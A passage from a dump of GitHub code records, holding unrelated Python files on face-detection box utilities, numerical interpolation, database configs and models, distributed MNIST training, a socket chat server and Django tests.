t_index[0]) / scale),\r\n np.round((stride * t_index[1] + cell_size) / scale),\r\n np.round((stride * t_index[0] + cell_size) / scale),\r\n score,\r\n reg])\r\n\r\n return bbox.T\r\n\r\ndef py_nms(bboxes, thresh, mode=\"union\"):\r\n assert mode in ['union', 'minimum']\r\n\r\n x1 = bboxes[:, 0]\r\n y1 = bboxes[:, 1]\r\n x2 = bboxes[:, 2]\r\n y2 = bboxes[:, 3]\r\n scores = bboxes[:, 4]\r\n\r\n areas = (x2 - x1 + 1) * (y2 - y1 + 1)\r\n order = scores.argsort()[::-1]\r\n\r\n keep = []\r\n while order.size > 0:\r\n i = order[0]\r\n keep.append(i)\r\n xx1 = np.maximum(x1[i], x1[order[1:]])\r\n yy1 = np.maximum(y1[i], y1[order[1:]])\r\n xx2 = np.minimum(x2[i], x2[order[1:]])\r\n yy2 = np.minimum(y2[i], y2[order[1:]])\r\n\r\n w = np.maximum(0.0, xx2 - xx1 + 1)\r\n h = np.maximum(0.0, yy2 - yy1 + 1)\r\n inter = w * h\r\n if mode == \"union\":\r\n ovr = inter / (areas[i] + areas[order[1:]] - inter)\r\n else:\r\n ovr = inter / np.minimum(areas[i], areas[order[1:]])\r\n # keep\r\n inds = np.where(ovr <= thresh)[0]\r\n order = order[inds + 1]\r\n\r\n return keep\r\n\r\ndef iou(box, boxes):\r\n# print('iou----------:',boxes.shape)\r\n box_area = (box[2] - box[0] + 1) * (box[3] - box[1] + 1)\r\n area = (boxes[:, 2] - boxes[:, 0] + 1) * (boxes[:, 3] - boxes[:, 1] + 1)\r\n xx1 = np.maximum(box[0], boxes[:, 0])\r\n yy1 = np.maximum(box[1], boxes[:, 1])\r\n xx2 = np.minimum(box[2], boxes[:, 2])\r\n yy2 = np.minimum(box[3], boxes[:, 3])\r\n\r\n # compute the width and height of the bounding box\r\n w = np.maximum(0, xx2 - xx1 + 1)\r\n h = np.maximum(0, yy2 - yy1 + 1)\r\n\r\n inter = w * h\r\n ovr = inter / (box_area + area - inter)\r\n return ovr\r\n\r\n\r\n","repo_name":"YIYIMZ/yiyi_mtcnn_keras","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"3"} +{"seq_id":"13082223849","text":"#!/usr/bin/env python\n\nmongodb_config = {\n 'host': 'localhost',\n 'port': 27017,\n 'db': 'micromort',\n 'straitstimes_headlines_collection': 'straitstimes_headlines',\n 'straitstimes_article_collection': 'straitstimes_article',\n 'collection': 'articles',\n 'asiaone_headlines_collection': 'asiaone_headlines',\n 'asiaone_article_collection': 'asiaone_article',\n 'straitstimes_labeling_collection': 'straitstimes_labeling',\n 'channelnewsasia_labeling_collection': 'channelnewsasia_labeling',\n 'businesstimes_labeling_collection': 'businesstimes_labeling',\n 'asiaone_labeling_collection': 'asiaone_labeling',\n 'dbs': {\n 'forums' :{\n \"sgtalk\":\"sgtalk\",\n \"hardwarezone\":'hardwarezone'\n },\n \"rss\" : {\n \"db\" : \"micromort\",\n \"collection\" : \"rss\"\n },\n \"news_websites\" : {\n 'db' : \"micromort\",\n \"collection\" : \"categorized_news\"\n },\n \"news_tweets\" : {\n \"db\" : \"micromort\",\n \"collection\" : \"news_tweets\"\n }\n },\n 'onespace_host': '172.29.33.45'\n }\n","repo_name":"mannuscript/micromort","sub_path":"micromort/resources/configs/mongodbconfig.py","file_name":"mongodbconfig.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6827769493","text":"\n# coding: utf-8\n\n# # Polynomial Interpolation\n# \n# Polynormial interpolation tries to find a (n-1) degree polynormial passes through n points\n# \n# Polynormial interpolation is a globel method, paying **less attention** to the local properties. If there are many data pointsr ranging widely, polynormial may **not** be a good choice. \n# \n# Example: property of a material under different temperatures\n\n# ## Lagrange’s Method\n\n\n# import modules needed\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass LagrangeInt():\n def __init__(self, xData, yData): # initialize all the parameter\n self.xData = xData\n self.yData = yData\n self.length = len(xData)\n \n def l(self, x, i, xData):\n \"\"\"\n return the value of cardinal functions\n x is the point where the base function is evaluated,\n i is the order and xData is obvious\n \"\"\"\n t1, t2 = 1, 1\n for j in range(self.length):\n if j != i:\n t1 *= x - self.xData[j]\n t2 *= self.xData[i] - self.xData[j]\n return t1 / t2\n \n def inter(self, x):\n \"\"\"return the interpolated resualt on interval x\n \"\"\"\n s = 0\n for i in range(self.length):\n s += self.l(x, i, self.xData) * self.yData[i]\n return s\n\n\n# put it to test\n# votage and current\nx = np.array([-1, 0, 0.27, 2.55, 3.82, 4.92, 5.02])\ny = np.array([-14.58, 0, 0, 0, 0, 0.88, 11.17])\n\np = LagrangeInt(x, y)\nx1 = np.linspace(-1, 5.02)\ny1 = p.inter(x1)\nplt.scatter(x, y, color='red')\nplt.plot(x1, y1)\nplt.xlabel('Votage')\nplt.ylabel('Current')\nplt.title('Relationship between Votage and Current')\nplt.grid()\nplt.legend(['Experimental', 'Interpolated'], loc='best')\nplt.show()\n\n\n# Ei(x)\nx = np.array([0.1, 0.2, 0.3, 0.4, 0.5])\ny = np.array([-1.6228, -0.8218, -0.3027, 0.1048, 0.4542])\n\np = LagrangeInt(x, y)\nx1 = np.linspace(0.1, 0.5)\ny1 = p.inter(x1)\nplt.scatter(x, y, color='red')\nplt.plot(x1, y1)\nplt.xlabel('$x$')\nplt.ylabel('$y$')\nplt.title('The value of $Ei(x)$')\nplt.grid()\nplt.legend(['Discrete', 'Interpolated'], loc='best')\nplt.show()\n","repo_name":"Jokiva/Computational-Physics","sub_path":"old/Interpolation/Lagrange’s Method.py","file_name":"Lagrange’s Method.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"42303806747","text":"from sqlalchemy import Column, Table, String, Integer,\\\n Float, Boolean, TIMESTAMP, Text, ForeignKey\nfrom sqlalchemy.orm import relationship, backref\n\nfrom nodetraq.model.meta import Base, now\n\nflag_lookup = Table (\n 'flag_lookups', Base.metadata,\n Column('node_flag_info_id', Integer, ForeignKey('node_flag_info.id')),\n Column('flag_id', Integer, ForeignKey('flags.id')),\n )\n\nnode_flags_lookup = Table (\n 'flagged_node_lookups', Base.metadata,\n Column('node_id', Integer, ForeignKey('nodes.id')),\n Column('node_flag_info_id', Integer, ForeignKey('node_flag_info.id')),\n Column('user_id', Integer, ForeignKey('users.id'))\n )\n\nclass NodeFlagInfo(Base):\n __tablename__ = 'node_flag_info'\n\n id = Column(Integer, primary_key=True)\n user = relationship('User', secondary=node_flags_lookup, uselist=False)\n description = Column(String(255))\n flags = relationship('Flag', secondary=flag_lookup)\n\nclass Flag(Base):\n __tablename__ = 'flags'\n\n id = Column(Integer, primary_key=True)\n name = Column(String(255))\n description = Column(String(255))\n\n\n","repo_name":"seryl/Nodetraq","sub_path":"nodetraq/model/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"34088953016","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport xlrd\n\n# 等级分数段定义,分位数\nGOOD = 0.667 # 优\nBAD = 0.333 # 良\n\ndata1 = pd.read_csv(\"Userrate2.csv\")\ncolumns1 = ['user_id', 'rate', '字符串', '线性表', '数组', '查找算法', '排序算法', '数字操作', '图结构', '树结构']\ndata2 = pd.read_excel(r\"./rate_per_person_per_fact.xls\")\ncolumns2 = ['user_id', 'toanslines', 'upload_times', 'answer_rate', 'final_score', 'first_score', 'total_time', 'timeavg', 'scoreavg']\n\n\n#生成分位数文件\nquantiled = data1[columns1[1:]].quantile([BAD,GOOD])\nquantiled.index = ['bad','good']\ntmp = data2[columns2[1:]].quantile([BAD,GOOD])\ntmp.index = ['bad','good']\n\nresult = pd.concat([quantiled,tmp],axis=1,join='inner')\n\nresult.to_csv('quantiles.csv',encoding=\"utf_8_sig\")","repo_name":"vessland/DataScience","sub_path":"hw5/quantiles.py","file_name":"quantiles.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35476713256","text":"from __future__ import annotations\n\nfrom types import ModuleType\nfrom typing import List, Dict\nfrom dataclasses import dataclass\nfrom pathlib import Path\nimport importlib, sys, inspect\n\nfrom . import utils, database\n\n@dataclass\nclass ExtObj:\n classObj : NatsumeExt = None\n moduleObj : ModuleType = None\n alias : str = None\n\n @classmethod\n def validateArgs(cls, obj: NatsumeExt):\n printError = utils.NatsumeUtils().printError\n printInfo = utils.NatsumeUtils().printInfo\n\n if obj.args is None:\n printError(\"ValidateArgs\", f\"Skipping {obj.name}: No Args found!\")\n return\n if type(obj.args) != list: \n printError(\"ValidateArgs\", \"Invalid type!\")\n obj.args = [{}]\n \n for arg in obj.args:\n if \"name\" not in arg.keys():\n printInfo(\"VaildateArgs\", \"Args Name isn\\'t listed!\")\n if \"optional\" not in arg.keys():\n arg[\"optional\"] = False\n if \"type\" not in arg.keys():\n arg[\"type\"] = str\n if \"default\" not in arg.keys():\n arg[\"default\"] = \"\"\n\nclass NatsumeExtMan:\n def __init__(self, main, utility: utils.NatsumeUtils, database: database.NatsumeDatabase, moduleList: List = []):\n self.__VER = 1.0\n self.__loadedExt = 0\n self.__extFolder = \"ext\"\n self.utils: utils.NatsumeUtils = utility\n self.database: database.NatsumeDatabase = database\n self.settings = self.utils.getConfig()\n self.moduleList = self.settings[\"natsume\"][\"extensions\"]\n self.modules : Dict[str, ExtObj] = dict()\n self.extRef : Dict[str, ExtObj.classObj] = dict() \n self.base = main\n\n def execute(self, ext, args):\n try:\n ext : ExtObj.classObj = self.extRef[ext]\n minimumArgs : List[Dict] = list(arg for arg in ext.args if not arg[\"optional\"]) if ext.args else None\n optionalArgs: List[Dict] = list(arg for arg in ext.args if arg[\"optional\"]) if ext.args else None\n # No Argument needed\n if (not minimumArgs) and (not args):\n self.utils.printInfo(\"Execute\", \"No argument detected\")\n if not optionalArgs:\n args = None\n else:\n for arg in optionalArgs:\n args[arg[\"name\"]] = arg[\"default\"]\n else:\n for seq, arg in enumerate(ext.args):\n attempt = 1\n\n # parse argument passed by keywords\n if arg[\"name\"] in args:\n if arg['type'] == bool:\n args[arg['name']] = self.utils.parseBool(args[arg[\"name\"]])\n else:\n args[arg['name']] = arg['type'](args[arg[\"name\"]])\n continue\n \n # parse argument passed by value\n if f'args_{seq+1}' in args:\n if arg['type'] == bool:\n args[arg['name']] = self.utils.parseBool(args[f'args_{seq+1}'])\n else:\n args[arg['name']] = arg['type'](args[f'args_{seq+1}'])\n args.pop(f'args_{seq+1}') \n continue\n\n if arg[\"optional\"]: \n args[arg['name']] = arg.get('default', None)\n continue\n\n for i in range(3):\n temp = input(f\"{arg['name']}: \")\n if (not temp) and attempt <= 3: \n if attempt != 3:\n attempt += 1\n continue\n else:\n if not arg[\"default\"]:\n raise ValueError(f\"{arg['name']} can't be empty\")\n \n if \"cancel\" in temp.lower(): \n raise Exception(\"Action canceled\")\n if arg['default'] and (not temp):\n args[arg['name']] = arg.get('default')\n break\n \n except Exception as e:\n self.utils.printError(\"Execute\", f\"{e}\")\n except KeyError:\n self.utils.printError(\"Execute\", f\"{ext} isn't a valid alias\")\n except ValueError as e:\n self.utils.printError(\"Execute\", f\"{e}\")\n else:\n if args:\n ext.run(**args)\n else:\n ext.run()\n\n def getCurrentModules(self, alias: str=None):\n if self.__loadedExt:\n self.utils.printError(\"getCurrentModules\", \"No modules has been loaded!\")\n exit()\n if alias:\n return self.extRef[alias]\n return self.modules.items()\n\n def reload(self, mod):\n try:\n newExtRef = self.extRef.copy()\n newExtObj = self.modules.copy()\n\n for ext, extObj in self.modules.items():\n if mod in extObj.alias:\n newModule = importlib.reload(extObj.moduleObj)\n\n for mod in inspect.getmembers(newModule, inspect.isclass):\n if issubclass(mod[1], NatsumeExt):\n self.utils.printInfo(\"ExtReload\", f\"Reloaded {mod[1]}\")\n classObj = mod[1](utils=self.utils, main=self.base, db=self.database)\n moduleName = classObj.name\n if moduleName != extObj.classObj.name:\n self.utils.printInfo(\"ExtReload\", f\"Module's name has changed: {ext.classObj.name}->{moduleName}\")\n \n newAlias = list(filter(lambda x: x not in extObj.alias, classObj.alias))\n self.utils.printInfo(\"ExtReload\", \"Removing old instance from list\")\n newExtObj.pop(extObj.classObj.name)\n self.utils.printInfo(\"ExtReload\", \"Removing aliases from list\")\n for alias in extObj.alias:\n newExtRef.pop(alias)\n\n ExtObj.validateArgs(classObj)\n newExtObj[moduleName] = ExtObj(classObj, newModule, classObj.alias)\n \n for alias in classObj.alias:\n if alias == \"NatsumeBaseExtensions\": continue\n if alias not in newExtRef.keys():\n newExtRef[alias] = newExtObj[moduleName].classObj\n if alias in newAlias: self.utils.printInfo(\"ExtReload\", f\"Found new alias: {alias}\")\n else:\n self.utils.printInfo(\"ExtReload\", newExtObj[moduleName].classObj.alias)\n self.utils.printInfo(\"ExtReload\", extObj.classObj.alias)\n raise AttributeError(f\"Conflicting Aliases Found! {alias}\")\n\n except Exception as e:\n self.utils.printError(\"ExtLoader\", e)\n else:\n self.modules = newExtObj\n self.extRef = newExtRef\n self.base.currMod = self.extRef\n\n def loadAll(self):\n if self.__loadedExt != 0:\n self.utils.printError(\"ExtLoader\", \"Modules already loaded!\")\n \n try:\n for module in self.moduleList:\n for submodule in filter(lambda x: (not x.name.endswith(\"_database.py\")) and (\"__\" not in x.name) and (\".py\" == x.suffix), \n list(Path(self.__extFolder, module).glob(\"*\"))):\n pkgName = f\"{self.__extFolder}.{module}\"\n fullModule = str(submodule).replace(\"\\\\\", \".\").split(\".py\")[0]\n moduleObj = importlib.import_module(fullModule, pkgName)\n \n for mod in inspect.getmembers(moduleObj, inspect.isclass):\n if issubclass(mod[1], NatsumeExt):\n self.utils.printInfo(\"ExtLoader\", f\"Found {mod[1]}\")\n classObj = mod[1](utils=self.utils, main=self.base, db=self.database)\n moduleName = classObj.name\n else:\n self.utils.printError(\"ExtLoader\", F\"Found {mod[1]}\")\n \n if not (classObj or fullModule in sys.modules):\n raise AttributeError(f\"{module} contains no suitable extensions\")\n # Mapping aliases and generic name into classObj\n ExtObj.validateArgs(classObj)\n self.modules[moduleName] = ExtObj(classObj, moduleObj, classObj.alias)\n \n for alias in self.modules[moduleName].classObj.alias:\n if alias == \"NatsumeBaseExtensions\": continue\n if alias not in self.extRef.keys():\n self.extRef[alias] = self.modules[moduleName].classObj\n else:\n raise AttributeError(f\"Conflicting Aliases Found! {alias}\")\n\n self.utils.printInfo(\"ExtLoader\", f\"{moduleName}, {fullModule}\")\n\n except Exception as e:\n self.utils.printError(\"ExtLoader\", e)\n finally:\n for cmd, mod in self.extRef.items():\n self.utils.printInfo(\"Available Cmdlet\", f\"{cmd} {mod}\")\n return self.extRef\n\n def reloadAll(self):\n self.__loadedExt = 0\n newExtDict: Dict[str, ExtObj] = dict()\n newExtRef: Dict[str, ExtObj.classObj] = dict()\n\n try:\n for mod, ext in self.modules.items():\n moduleObj = importlib.reload(ext.moduleObj)\n\n for mod in inspect.getmembers(moduleObj, inspect.isclass):\n if issubclass(mod[1], NatsumeExt):\n self.utils.printInfo(\"ExtReload\", f\"Found {mod[1]}\")\n classObj = mod[1](utils=self.utils, main=self.base, db=self.database)\n moduleName = classObj.name\n if moduleName != ext.classObj.name:\n self.utils.printInfo(\"ExtReload\", f\"Module's name has changed: {ext.classObj.name}->{moduleName}\")\n\n ExtObj.validateArgs(classObj)\n newAlias = list(filter(lambda x: x not in ext.alias, classObj.alias))\n newExtDict[moduleName] = ExtObj(classObj, moduleObj, classObj.alias)\n\n \n for alias in classObj.alias:\n if alias == \"NatsumeBaseExtensions\": continue\n if alias not in newExtRef.keys():\n newExtRef[alias] = newExtDict[moduleName].classObj\n if alias in newAlias: self.utils.printInfo(\"ExtReload\", f\"Found new alias: {alias}\")\n else:\n self.utils.printInfo(\"ExtReload\", newExtDict[moduleName].classObj.alias)\n self.utils.printInfo(\"ExtReload\", ext.classObj.alias)\n raise AttributeError(f\"Conflicting Aliases Found! {alias}\")\n \n self.utils.printInfo(\"ExtReload\", f\"Reloaded {moduleName}\")\n except Exception as e:\n self.utils.printError(\"ExtReload\", e)\n else:\n self.modules = newExtDict\n self.extRef = newExtRef\n self.base.currMod = self.extRef\n\nclass NatsumeExt:\n aliasBind = dict()\n def __init__(self, main, utils:utils.NatsumeUtils, db:database.NatsumeDatabase):\n self.__VER = 1.0\n self.base = main\n self.utils = utils\n self.session = db.session\n self.name = \"NatsumeBaseExtensions\"\n self.args : list[dict] = None\n self.help = \"Wha! Nothing to see here!\"\n self.group = \"Misc\"\n self.desc = self.help\n self.alias = [self.name]\n self.isSystem = False\n self.run = self.execute\n\n def execute(self, args=None):\n return print(\"Whoa, Unimplemented Feature Here! Nice nice.... now.. GET BACK TO WORK!\")\n\n def __repr__(self):\n return f\"playlistId parameter cannot be found.' in e:\n mes = _('This channel is not available!')\n sh.objs.get_mes(f,mes).show_warning()\n else:\n mes = _('Third-party module has failed!\\n\\nDetails: {}')\n mes = mes.format(e)\n sh.objs.get_mes(f,mes).show_warning()\n\n\nobjs = Objects()\ncom = Commands()\n\n\nif __name__ == '__main__':\n f = 'meta.__main__'\n sh.com.start()\n objs.get_playlist().reset('UU63-vXUchmKqP7K9WE2jCfg')\n objs.playlist.run()\n video = objs.get_videos().get_current()\n print('CHANID:',video.chid)\n print('PLAYID:',video.playid)\n sh.com.end()\n","repo_name":"sklprogs/Yatube","sub_path":"src/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":35119,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
+{"seq_id":"14228306336","text":"#!/usr/bin/env python\n\nclass Sensor:\n def __init__(self, x, y, b_x, b_y):\n self.x = x\n self.y = y\n self.b_x = b_x\n self.b_y = b_y\n self.b_dist = self.getDist(b_x, b_y)\n self.min_x = x - self.b_dist\n self.min_y = y - self.b_dist\n self.max_x = x + self.b_dist\n self.max_y = y + self.b_dist\n\n def getDist(self, x, y):\n return abs(self.x - x) + abs(self.y - y)\n\n\ndef main():\n with open('puzzle_input.txt', 'r') as f:\n input_lines = f.read().splitlines()\n\n sensors: list[Sensor] = []\n strip_chars = 'xy=,:'\n for line in input_lines:\n items = line.split()\n x = int(items[2].strip(strip_chars))\n y = int(items[3].strip(strip_chars))\n b_x = int(items[8].strip(strip_chars))\n b_y = int(items[9].strip(strip_chars))\n sensors.append(Sensor(x, y, b_x, b_y))\n\n group: list[Sensor] = []\n for sensor1 in sensors:\n if sensor1 in group:\n continue\n for sensor2 in sensors:\n if sensor1 is sensor2:\n continue\n if sensor2 in group:\n continue\n distance = sensor1.getDist(sensor2.x, sensor2.y)\n if distance == sensor1.b_dist + sensor2.b_dist + 2:\n group.append(sensor1)\n group.append(sensor2)\n\n # oh god I have to do math!\n\n # find the line segments\n x1 = group[0].x\n y1 = group[0].y\n if group[0].y < group[1].y:\n y1 += group[0].b_dist + 1\n else:\n y1 -= group[0].b_dist + 1\n\n x2 = group[0].x\n y2 = group[0].y\n if group[0].x < group[1].x:\n x2 += group[0].b_dist + 1\n else:\n x2 -= group[0].b_dist + 1\n\n x3 = group[2].x\n y3 = group[2].y\n if group[2].y < group[3].y:\n y3 += group[2].b_dist + 1\n else:\n y3 -= group[2].b_dist + 1\n\n x4 = group[2].x\n y4 = group[2].y\n if group[2].x < group[3].x:\n x4 += group[2].b_dist + 1\n else:\n x4 -= group[2].b_dist + 1\n\n # do some freakin math\n m1 = (y2 - y1) / (x2 - x1)\n m2 = (y4 - y3) / (x4 - x3)\n b1 = y1 - m1 * x1\n b2 = y3 - m2 * x3\n xi = (b1 - b2) / (m2 - m1)\n yi = m1 * xi + b1\n\n print('Tuning frequency:', int(xi * 4000000 + yi))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"robro/aoc2022","sub_path":"15/15b.py","file_name":"15b.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22449037872","text":"import tensorflow as tf\nimport byteps.tensorflow as bps\n\nbps.init()\n\n# BytePS: pin GPU to be used to process local rank (one GPU per process)\ngpus = tf.config.experimental.list_physical_devices('GPU')\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\nif gpus:\n tf.config.experimental.set_visible_devices(gpus[bps.local_rank()], 'GPU')\n\n# Before launching, need to fist download the dataset to ~/.keras/datasets\n(mnist_images, mnist_labels), _ = \\\n tf.keras.datasets.mnist.load_data(path='mnist-%d.npz' % bps.rank())\n\ndataset = tf.data.Dataset.from_tensor_slices(\n (tf.cast(mnist_images[..., tf.newaxis] / 255.0, tf.float32),\n tf.cast(mnist_labels, tf.int64))\n)\ndataset = dataset.repeat().shuffle(10000).batch(128)\n\nmnist_model = tf.keras.Sequential([\n tf.keras.layers.Conv2D(32, [3, 3], activation='relu'),\n tf.keras.layers.Conv2D(64, [3, 3], activation='relu'),\n tf.keras.layers.MaxPooling2D(pool_size=(2, 2)),\n tf.keras.layers.Dropout(0.25),\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dropout(0.5),\n tf.keras.layers.Dense(10, activation='softmax')\n])\nloss = tf.losses.SparseCategoricalCrossentropy()\n\nopt = tf.optimizers.Adam(0.001 * bps.size())\n\ncheckpoint_dir = './checkpoints'\ncheckpoint = tf.train.Checkpoint(model=mnist_model, optimizer=opt)\n\n\n@tf.function\ndef training_step(images, labels, first_batch):\n with tf.GradientTape() as tape:\n probs = mnist_model(images, training=True)\n loss_value = loss(labels, probs)\n\n tape = bps.DistributedGradientTape(tape)\n\n grads = tape.gradient(loss_value, mnist_model.trainable_variables)\n opt.apply_gradients(zip(grads, mnist_model.trainable_variables))\n\n # Note: broadcast should be done after the first gradient step to ensure optimizer\n # initialization.\n if first_batch:\n bps.broadcast_variables(mnist_model.variables, root_rank=0)\n bps.broadcast_variables(opt.variables(), root_rank=0)\n\n return loss_value\n\n\n# BytePS: adjust number of steps based on number of GPUs.\nfor batch, (images, labels) in enumerate(dataset.take(10000 // bps.size())):\n loss_value = training_step(images, labels, batch == 0)\n\n if batch % 10 == 0 and bps.local_rank() == 0:\n print('Step #%d\\tLoss: %.6f' % (batch, loss_value))\n\nif bps.rank() == 0:\n checkpoint.save(checkpoint_dir)","repo_name":"bytedance/byteps","sub_path":"example/tensorflow/tensorflow2_mnist.py","file_name":"tensorflow2_mnist.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":3517,"dataset":"github-code","pt":"3"}
+{"seq_id":"27792039541","text":"from collections import defaultdict\n\nmy_dict = defaultdict(object)\nmy_dict = {1: 'a'}\n\nprint(my_dict[2]) # object если нет такого ключа\n\ns = 'Hello'\nd = defaultdict(int)\nfor k in s:\n d[k] += 1\n print(sorted(d.items()))","repo_name":"EvgeniyBudaev/python_learn","sub_path":"advanced_modules/colections_default_dict.py","file_name":"colections_default_dict.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7513638701","text":"'Chat Room Connection - Client=To-Client'\nimport threading\nimport socket \nimport sys\nhost = '127.0.0.1' #localhost\nport = 8000\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((host, port))\nserver.listen()\n\nclients = []\naliases = []\n\n# Functions to hanlde clients connections\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\ndef handle_client(client):\n while True:\n try:\n msg = message = client.recv(1024)\n if msg.decode().startswith('REMOVE'):\n client_that_quit = msg.decode()[7:]\n quit_client(client_that_quit)\n else: \n broadcast(message)\n except:\n if client in clients:\n index = clients.index(client)\n clients.remove(client)\n client.close()\n alias = aliases[index]\n broadcast(f'{alias} has left the chat room!'.encode('utf-8'))\n aliases.remove(alias)\n break\n\n\ndef quit_client(name):\n name_index = aliases.index(name)\n client_to_remove = clients[name_index]\n clients.remove(client_to_remove)\n client_to_remove.close()\n aliases.remove(name)\n print(f'{name} has quit the chat.')\n broadcast(f'{name} has quit the chat.'.encode())\n\n\n#Main Function to recieve the clients connection\n\n\ndef receive():\n while True:\n print('Server is Running and Listening ....')\n client, address = server.accept()\n print(f'connection is established with {str(address)}')\n \n client.send(bytes('alias', 'utf-8'))\n alias = client.recv(1024).decode('utf-8')\n print(alias)\n aliases.append(alias)\n clients.append(client)\n \n print(f'The alias of this client is {alias}.\\n')\n print(f'{alias} has connected to the chat room.\\n')\n broadcast(f'{alias} has connected to the chat room.\\n'.encode('utf-8'))\n client.send('You are now connected!\\n'.encode('utf-8'))\n \n thread = threading.Thread(target = handle_client, args=(client,))\n thread.start()\n\n\nif __name__ == \"__main__\" :\n receive()\n","repo_name":"curs3dmav3r/groupchat","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"86408713877","text":"import shutil\nimport tempfile\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom django.core.files.uploadedfile import SimpleUploadedFile\n\nfrom ..models import Post, Group\n\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\nUser = get_user_model()\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass FormTests(TestCase):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n cls.author = User.objects.create_user(username='author')\n cls.author_client = Client()\n cls.author_client.force_login(cls.author)\n\n cls.small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n )\n Post.objects.create(\n author=cls.author,\n text='Первый пост',\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def test_new_post(self):\n self.assertEqual(Post.objects.all().count(), 1)\n\n small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n )\n uploaded = SimpleUploadedFile(\n name='small.gif',\n content=small_gif,\n content_type='image/gif'\n )\n\n url = reverse('posts:create_post')\n data = {\n 'text': 'Новый пост',\n 'image': uploaded,\n }\n FormTests.author_client.post(url, data=data)\n\n self.assertEqual(Post.objects.all().count(), 2)\n\n new_post = Post.objects.order_by('id').last()\n self.assertEqual(new_post.text, data['text'])\n self.assertEqual(new_post.image, \"posts/small.gif\")\n\n def test_edit_post(self):\n updated_post_text = 'Изменный пост'\n post = Post.objects.all().last()\n self.assertNotEqual(post.text, updated_post_text)\n\n url = reverse('posts:post_edit', kwargs={\n 'post_id': post.id,\n })\n\n FormTests.author_client.post(url, data={\n 'text': updated_post_text,\n })\n post.refresh_from_db()\n self.assertEqual(post.text, updated_post_text)\n\n def test_new_post_group(self):\n self.assertEqual(Post.objects.all().count(), 1)\n url = reverse('posts:create_post')\n new_post_text = 'Новый пост'\n group = Group.objects.create(\n title='Тестовая группа',\n slug='Slug',\n description='Тестовое описание',\n )\n data = {\n 'text': new_post_text,\n 'group': group.id,\n }\n FormTests.author_client.post(url, data=data)\n\n self.assertEqual(Post.objects.all().count(), 2)\n\n new_post = Post.objects.order_by('id').filter(group=group).last()\n self.assertEqual(new_post.text, new_post_text)\n self.assertEqual(new_post.group, group)\n\n def test_new_post_anonim(self):\n self.assertEqual(Post.objects.all().count(), 1)\n\n url = reverse('posts:create_post')\n new_post_text = 'Новый пост'\n data = {\n 'text': new_post_text,\n }\n response = self.client.post(url, data=data)\n # здесь мы проверяем что пост не создан анонимом\n self.assertEqual(Post.objects.all().count(), 1)\n self.assertEqual(response.status_code, 302)\n\n updated_post_text = 'Изменный пост'\n post = Post.objects.all().last()\n\n url = reverse('posts:post_edit', kwargs={\n 'post_id': post.id,\n })\n\n self.client.post(url, data={\n 'text': updated_post_text,\n })\n self.assertEqual(Post.objects.all().count(), 1)\n self.assertEqual(response.status_code, 302)\n","repo_name":"Tastybaev/hw05_final","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
